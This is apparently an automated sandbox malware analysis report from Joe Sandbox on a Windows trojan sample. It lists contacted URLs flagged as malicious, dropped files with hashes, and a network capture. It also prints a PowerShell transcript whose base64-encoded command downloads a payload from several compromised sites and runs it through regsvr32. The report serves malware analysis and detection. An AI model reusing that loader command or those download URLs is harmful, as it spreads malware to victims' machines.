                                                                                http://piffl.com/piffl.com/a/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://nakharinitwebhosting.com/HSDYKN1X5GLF/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://dynamic.tsvchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://disneyplus.com/legal.svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318593022.000001C28003A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://activity.windows.comsvchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://cmentarz.5v.pl/themes/zalMkTb/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.jsonsintl.com4powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://help.disneyplus.com.svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              low
                                                                                              https://173.82.82.196:8080/Pregsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  173.82.82.196
                                                                                                  unknownUnited States
                                                                                                  35916MULTA-ASN1UStrue
                                                                                                  98.142.105.106
                                                                                                  jsonsintl.comUnited States
                                                                                                  33182DIMENOCUStrue
                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  127.0.0.1
                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                  Analysis ID:631940
                                                                                                  Start date and time: 23/05/202204:10:442022-05-23 04:10:44 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 7m 3s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:light
                                                                                                  Cookbook file name:defaultwindowscmdlinecookbook.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:34
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.win@26/11@2/4
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 51.3% (good quality ratio 27.5%)
                                                                                                  • Quality average: 32.8%
                                                                                                  • Quality standard deviation: 37.5%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 97%
                                                                                                  • Number of executed functions: 0
                                                                                                  • Number of non-executed functions: 0
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
                                                                                                  • TCP Packets have been reduced to 100
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.4.86, 173.222.108.226, 173.222.108.210, 20.223.24.244, 20.49.150.241, 51.11.168.232
                                                                                                  • Excluded domains from analysis (whitelisted): a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, settings-prod-uks-1.uksouth.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, settings-prod-uks-2.uksouth.cloudapp.azure.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  TimeTypeDescription
                                                                                                  04:12:07API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                  04:12:23API Interceptor11x Sleep call for process: svchost.exe modified
                                                                                                  04:13:11API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x94425ecd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):786432
                                                                                                  Entropy (8bit):0.2507183390498187
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:k+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bSB2nSB2RSjlK/+mLesOj1J2
                                                                                                  MD5:65096A2375AA8E14CAE26EF5EC5DD857
                                                                                                  SHA1:BE53547488DD940484A11B1A9374EA56B2EC255E
                                                                                                  SHA-256:2F13500A394E9B7CE4C6A432A95AFBCB0D609ECE529B4F6C87418D9722C1832C
                                                                                                  SHA-512:EB4AEAA99D6D27BAE141735571D78D43634EA08F316F1605794FB0B529A1D73684EF407C445FF3457D0AE4573B2CC5DA9B81802A761ABCDA7B5C6F688A42A6D0
                                                                                                  Malicious:false
                                                                                                  Preview:.B^.... ................e.f.3...w........................&..........w.......z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..............................................................................................................................................................................................................................................z.}................w.M......z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                                  Category:dropped
                                                                                                  Size (bytes):61480
                                                                                                  Entropy (8bit):7.9951219482618905
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                                  Malicious:false
                                                                                                  Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):330
                                                                                                  Entropy (8bit):3.1125006849882624
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:kKhWL3oJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:K/kPlE99SNxAhUesE1
                                                                                                  MD5:DCE9A004D946C87E33243DDC0185A034
                                                                                                  SHA1:3AA126D54B78E17FBD45801408CBF163A517E456
                                                                                                  SHA-256:01707486342E26E1D36659B8AEFE27FE5DC4F398469FE7D5805E3FD3DD8BCD02
                                                                                                  SHA-512:004513A584518D66CDB99177C7CF825142FA5F2A540482326107BF810A870BB0385D16D5229127AC8642BBD068D85F2191CD87A3C6185A14F8C96BB4799753E2
                                                                                                  Malicious:false
                                                                                                  Preview:p...... ........i....n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19912
                                                                                                  Entropy (8bit):5.600422441425159
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:FtL15PvT3vVQUlt6fPQzPSBKniulSIBI9YSZraJrSU/ZzPU+Ywf:Da6YI4KiulSoyIrSMqG
                                                                                                  MD5:B1EB76CB3757B18702EE682758B5CA4C
                                                                                                  SHA1:4877F887D66EEBF412B11F5BAD363B2734E10366
                                                                                                  SHA-256:F7C851972C004DE468BB09048AA68F392DB92BABB881D07DF5CD643C43441308
                                                                                                  SHA-512:2A3E517861C1E5154FD05033537FB356DE155A8CBA15BDC92A13FE7716D0905914D02DFE521145899625AEE93BB910C327B1C23D212D933213121F619D247E0E
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........".....................,..............@..........H...............<@.^.L."My...:9..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)k.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.4................Zg5..:O..g..q..........System.Xml..@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].9.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):365056
                                                                                                  Entropy (8bit):7.158107270371674
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                                                                                  MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                                                                                  SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                                                                                  SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                                                                                  SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2556
                                                                                                  Entropy (8bit):5.9787753566855635
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:BZpvhqoO+VipJ7o/awfYnB33ZCqDYB1ZKVipJ7o/awfYnB334ZZ4:BZlhqN+kpOtYnBHwqDo1ZKkpOtYnBH4U
                                                                                                  MD5:D8DFC73A627F3204CDFD5F543515896C
                                                                                                  SHA1:C74E39E908D6C2287449E0B3D1976A63A43CD6D0
                                                                                                  SHA-256:AB84B79E3ACFEB7B4B5B61A37E0A6ABCFC237CE17899B2E9565AFFC97FA6FD23
                                                                                                  SHA-512:FE89455789F7B060EF973AC5B2659A3F783B62BBB0AF524EBF81983BA23C90DA8DDCDFC45E716068FA51A58DF39171D57ED143812CE640F6D36B9B5744FD64CC
                                                                                                  Malicious:false
                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220523041200..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -c &{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9I
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55
                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                  Malicious:false
                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):9062
                                                                                                  Entropy (8bit):3.162901023900273
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zU+P:j+s+v+b+P+m+0+Q+q+D+P
                                                                                                  MD5:904D0EEEFCF574E86B6CE3871C23FBB7
                                                                                                  SHA1:240820BAC480151378FE2F68406A9E65A99835A7
                                                                                                  SHA-256:97C0E96A58A37800CA15149D017E941245D88128683CBD69FC1E2C7B67DD81B5
                                                                                                  SHA-512:F0FF46A2F7AB92E8958A4439E9BE412FB98649B866AF84B490DF3BFAC8367FE981512AD9C399088748027F954B01DCC9CFC5A12FC2C2A8E0119143E967DBDDE4
                                                                                                  Malicious:false
                                                                                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):365056
                                                                                                  Entropy (8bit):7.158107270371674
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                                                                                  MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                                                                                  SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                                                                                  SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                                                                                  SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                  No static file info
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 23, 2022 04:12:14.951395988 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.079406023 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.080873013 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.083039045 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.211183071 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349484921 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349541903 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349581003 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349620104 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349642992 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.349659920 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349700928 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349724054 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.349741936 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349756002 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.349781036 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349821091 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349860907 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.349875927 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.349999905 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.477739096 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.477828979 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.477871895 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.477911949 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.477955103 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.477994919 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478008032 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478033066 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478038073 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478072882 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478101015 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478111982 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478152990 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478177071 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478194952 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478231907 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478235960 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478272915 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478312969 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478329897 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478353024 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478393078 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478408098 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478432894 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478444099 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478473902 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478514910 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478554010 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.478554964 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.478607893 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.606606960 CEST804974198.142.105.106192.168.2.3
